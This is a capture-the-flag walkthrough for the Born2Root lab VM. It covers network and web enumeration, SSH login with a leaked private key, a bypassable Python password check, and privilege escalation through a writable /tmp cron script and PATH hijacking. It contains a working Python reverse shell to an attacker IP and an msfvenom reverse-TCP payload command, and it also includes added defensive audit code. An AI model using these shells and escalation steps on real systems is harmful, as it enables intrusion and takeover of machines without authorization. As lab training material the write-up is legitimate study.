BootToBeRoot: CTF walkthrough

Introduction

Name: Born2Root

Date of release: 10 Jun 2017

Author: Hadi Mene

Series: Born2Root


Enumeration

First of all, we can get the IP address of the VM.

[email protected]:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]
192.168.1.29    08:00:27:84:43:c4    CADMUS COMPUTER SYSTEMS (DUP: 2)
[redacted]        [redacted]            [redacted]
[redacted]        [redacted]            [redacted]

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.373 seconds (107.88 hosts/sec). 8 responded
[email protected]:~$

Then, we can scan the target to find open ports:

[email protected]:/$ nmap -A -sV -O -p22,80,111,47416 --reason 192.168.1.29

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-27 15:22 EST
Nmap scan report for debian-1.home (192.168.1.29)
Host is up, received arp-response (0.00059s latency).

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|   256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (EdDSA)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47416/tcp  status
|_  100024  1          49516/udp  status
47416/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms debian-1.home (192.168.1.29)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
[email protected]:/$

The RPC service does not give us any useful information, so this is going to be a web CTF.


Secret Key

After a quick directory enumeration with gobuster, we find two interesting folders: files and icons.

[email protected]:~$ gobuster -u http://192.168.1.29 -w /usr/share/seclists/Discovery/Web_Content/common.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 204,301,302,307,200
[+] Expanded     : true
=====================================================
http://192.168.1.29/files (Status: 301)
http://192.168.1.29/icons (Status: 301)
http://192.168.1.29/index.html (Status: 200)
http://192.168.1.29/manual (Status: 301)
http://192.168.1.29/robots.txt (Status: 200)
=====================================================
[email protected]:~$

The first one is empty, so it is useless:

[email protected]:/$ curl -s -L http://192.168.1.29/files/ | html2text -width 150 |uniq
** Index of /files **
[[ICO]]       Name             Last_modified Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory                 -
==================================================================================================================================================
     Apache/2.4.10 (Debian) Server at 192.168.1.29 Port 80
[email protected]:/$

But, fortunately for us, the second folder contains an unusual txt file named VDSoyuAXiO.txt:

[email protected]:/$ curl -s -L http://192.168.1.29/icons/ | html2text -width 150 |uniq
** Index of /icons **
[[ICO]]       Name              Last_modified    Size Description
==================================================================================================================================================
[[PARENTDIR]] Parent_Directory                     -
[[   ]]       README            2017-06-07 22:29 5.0K
[[TXT]]       README.html       2017-06-07 22:29  35K
[[TXT]]       VDSoyuAXiO.txt    2017-06-07 22:34 1.6K
[[IMG]]       a.gif             2017-06-07 22:29  246
[[IMG]]       a.png             2017-06-07 22:29  306
[[IMG]]       alert.black.gif   2017-06-07 22:29  242
[[IMG]]       alert.black.png   2017-06-07 22:29  293
[[IMG]]       alert.red.gif     2017-06-07 22:29  247
[[IMG]]       alert.red.png     2017-06-07 22:29  314
[[IMG]]       apache_pb.gif     2017-06-07 22:29 4.4K
[[IMG]]       apache_pb.png     2017-06-07 22:29 9.5K
[[IMG]]       apache_pb.svg     2017-06-07 22:29 260K
[[IMG]]       apache_pb2.gif    2017-06-07 22:29 4.1K
[[IMG]]       apache_pb2.png    2017-06-07 22:29  10K
[[IMG]]       back.gif          2017-06-07 22:29  216
[[IMG]]       back.png          2017-06-07 22:29  308
[[IMG]]       ball.gray.gif     2017-06-07 22:29  233
[[IMG]]       ball.gray.png     2017-06-07 22:29  298
[[IMG]]       ball.red.gif      2017-06-07 22:29  205

This is more than a simple txt file: it is an RSA private key, which we will use to log in to the server via SSH.

[email protected]:/$ curl -s -L http://192.168.1.29/icons/VDSoyuAXiO.txt

-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

[email protected]:/$

Note that we can find a list of potential users on the home page of the website:

  • Martin N;
  • Hadi M; and
  • Jimmy S


First Shell

First of all, we have to tighten the permissions on this private key, otherwise ssh refuses to use a key file that other users can read.

chmod 700 privatekey

Then we have to find out which user this private key belongs to.

[email protected]:~/Desktop$ for user in hadi jimmy martin; do
for> ssh -i privatekey $user@192.168.1.29 -o 'UserKnownHostsFile /dev/null'
for> done
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
hadi@192.168.1.29's password: 
Permission denied, please try again.
hadi@192.168.1.29's password: 
Permission denied, please try again.
hadi@192.168.1.29's password: 
hadi@192.168.1.29: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.
jimmy@192.168.1.29's password: 
Permission denied, please try again.
jimmy@192.168.1.29's password: 
Permission denied, please try again.
jimmy@192.168.1.29's password: 
jimmy@192.168.1.29: Permission denied (publickey,password).
The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : 

Apparently it belongs to Martin, but an extra password is required.

The creator made a mistake here: whatever password you enter, the check always passes. The Python script, launched from the last line of .bashrc:

martin@debian:~$ cat .bashrc |tail -1
/var/tmp/login.py
martin@debian:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

# Bug: Python reads this as (password == "secretsec") or "secretlab";
# a non-empty string literal is always truthy, so any input is accepted.
if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")
martin@debian:~$ 
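The following added example (not part of the original writeup or of the CTF image) reproduces the faulty condition from login.py next to the intended one, and uses the ast module to show how the interpreter actually groups the expression; the function names are my own.

```python
import ast

# Passwords the script meant to accept, as written in login.py.
SECRETS = {"secretsec", "secretlab"}

def check_vulnerable(password: str) -> bool:
    # Same condition as login.py. Python parses it as
    # (password == "secretsec") or ("secretlab"); the second operand is a
    # non-empty string literal, which is truthy, so the result is True for
    # every input, including the empty string.
    return bool((password) == "secretsec" or "secretlab")

def check_fixed(password: str) -> bool:
    # The intended check: the entered value must be one of the secrets.
    return password in SECRETS

def top_level_operator(expr: str) -> str:
    # Returns the outermost AST node of a Python expression. For the buggy
    # condition this is BoolOp (an "or" of two values), not a Compare.
    node = ast.parse(expr, mode="eval").body
    return type(node).__name__

if __name__ == "__main__":
    for pw in ("secretsec", "secretlab", "wrong", ""):
        print(f"{pw!r:12} vulnerable={check_vulnerable(pw)} fixed={check_fixed(pw)}")
    print(top_level_operator('(password) == "secretsec" or "secretlab"'))
    print(top_level_operator('password in {"secretsec", "secretlab"}'))
```

Running it shows vulnerable=True on every line, while only the two real secrets pass the fixed check.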


From Martin to Jimmy

After some research we find a mistake in the /etc/crontab file: a Python script in /tmp is run as the user jimmy every five minutes, without any check on who created it. Since /tmp is writable by every user, we simply have to create a Python script named sekurity.py there and it will be executed as jimmy.

martin@debian:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   jimmy   python /tmp/sekurity.py
martin@debian:~$ 
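From the defender's side, this is the kind of crontab entry an audit script should flag. The following added example (my own code, not from the writeup) parses a system crontab and reports jobs whose command runs a file from a shared directory such as /tmp, or a file that other users can modify; the sample crontab is constructed from the lines above.

```python
import os
import re
import stat

# Directories where any local user can create files on a standard install.
SHARED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample: the relevant lines of Born2Root's /etc/crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * *     jimmy   python /tmp/sekurity.py
"""

def parse_system_crontab(text):
    """Yield (user, command) for each job line of a system crontab:
    five time fields, then the user field, then the command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]

def writable_by_others(path):
    """True if the file exists and is group- or world-writable."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_risky_jobs(text):
    """Return (user, command, path) for every absolute path in a job's
    command that lives in a shared directory or is writable by others."""
    risky = []
    for user, command in parse_system_crontab(text):
        for path in re.findall(r"(?<![\w./-])/[\w./-]+", command):
            if path.startswith(SHARED_DIRS) or writable_by_others(path):
                risky.append((user, command, path))
    return risky

if __name__ == "__main__":
    for user, command, path in find_risky_jobs(SAMPLE_CRONTAB):
        print(f"[!] job for {user}: {command!r} runs {path} from an untrusted location")
```

Pointing it at a real /etc/crontab (and the files in /etc/cron.d) turns the mistake exploited here into a one-line finding.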

We can create this simple python reverse shell:

martin@debian:~$ cat /tmp/sekurity.py 
#!/usr/bin/python
import subprocess
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.116', 7734))

os.dup2(s.fileno(), 0) #stdin
os.dup2(s.fileno(), 1) #stdout
os.dup2(s.fileno(), 2) #stderr

process = subprocess.call(["/bin/sh","-i"])
martin@debian:~$ 

After a few minutes we have a shell with jimmy's privileges.


From Jimmy to Root

In jimmy's home folder we find the networker binary, which apparently runs a few network commands. The interesting thing about this binary is that it is executed with root privileges, so if we find a way to make it run arbitrary commands we will probably gain root.

Let's check whether this binary invokes system commands by relative path, that is by bare name instead of an absolute path:

jimmy@debian:~$ strings networker
strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^]
 Networker 2.0  
/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
[..snip..]

The echo command is the one called by bare name, so it looks like a good choice for us. Let's create a binary named echo.

[email protected]:/var/www/html$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=3477 LHOST=192.168.1.116 -f elf -o echo
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: echo

Now we can transfer the binary to the target with nc. Note that curl and wget are restricted and unusable there.

[Targeted system]
jimmy@debian:~$ nc -lvvp 7777 > echo
nc -lvvp 7777 > echo
listening on [any] 7777 ...
connect to [192.168.1.29] from kali-1.home [192.168.1.116] 35672
 sent 0, rcvd 152
jimmy@debian:~$


[My system]
[email protected]:/var/www/html$ nc -nvv 192.168.1.29 7777 < echo
(UNKNOWN) [192.168.1.29] 7777 (?) open
^C sent 152, rcvd 0
[email protected]:/var/www/html$

Finally we prepend jimmy's home folder to the PATH environment variable, so that our echo is found before the system one, and we should be good to go.

jimmy@debian:~$ export PATH=/home/jimmy:$PATH
export PATH=/home/jimmy:$PATH
jimmy@debian:~$ echo $PATH
echo $PATH
/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
jimmy@debian:~$

Unfortunately for us, the creator made another mistake with this binary and we are not able to exploit this vulnerability in the networker binary.
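The PATH trick relies on the shell searching PATH for a bare command name, and that is also where it breaks down: system() runs the command through /bin/sh, and echo is a builtin in sh (dash on Debian) and in bash, so the shell never looks it up on PATH at all. The following added example (my own code, not from the writeup) emulates that lookup on a constructed directory layout and shows the two things a privileged program can do about it: call commands by absolute path, or reset PATH to system directories before calling system(). The builtin list is partial.

```python
import os
import tempfile

# Commands that sh (dash) and bash run in-process; PATH is never consulted
# for them, so a same-named file in a PATH directory is not what runs.
SH_BUILTINS = {"echo", "cd", "pwd", "test", "export", "read", "printf", "kill"}

def resolve_first_word(command, path_env):
    """Emulate how sh picks the program for a command line passed to
    system(): a word containing '/' is used as given, a builtin runs
    in-process, anything else is the first executable found along PATH."""
    word = command.split()[0]
    if "/" in word:
        return word
    if word in SH_BUILTINS:
        return "builtin:" + word
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, word)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def demo():
    """Constructed layout: a user-writable dir and a system dir both hold a
    'ping'. Returns what each command resolves to under an inherited
    (user-controlled) PATH and under a PATH reset to the system dir only."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        home, system = os.path.join(root, "home"), os.path.join(root, "bin")
        for d in (home, system):
            os.makedirs(d)
            fake = os.path.join(d, "ping")
            open(fake, "w").close()
            os.chmod(fake, 0o755)
        paths = {"inherited": home + ":" + system, "sanitized": system}
        commands = [
            "/bin/ping -c 1 localhost",          # absolute path: PATH irrelevant
            "echo 'echo linux tool version 5'",  # builtin: PATH irrelevant
            "ping -c 1 localhost",               # bare name: PATH decides
        ]
        for label, path_env in paths.items():
            for cmd in commands:
                found = resolve_first_word(cmd, path_env)
                # strip the temp root so results read as /home/... or /bin/...
                results[(label, cmd)] = found.replace(root, "", 1) if found else None
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Only the bare "ping" changes with PATH; the absolute-path command and the echo builtin resolve the same way regardless of what the caller put in the environment.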
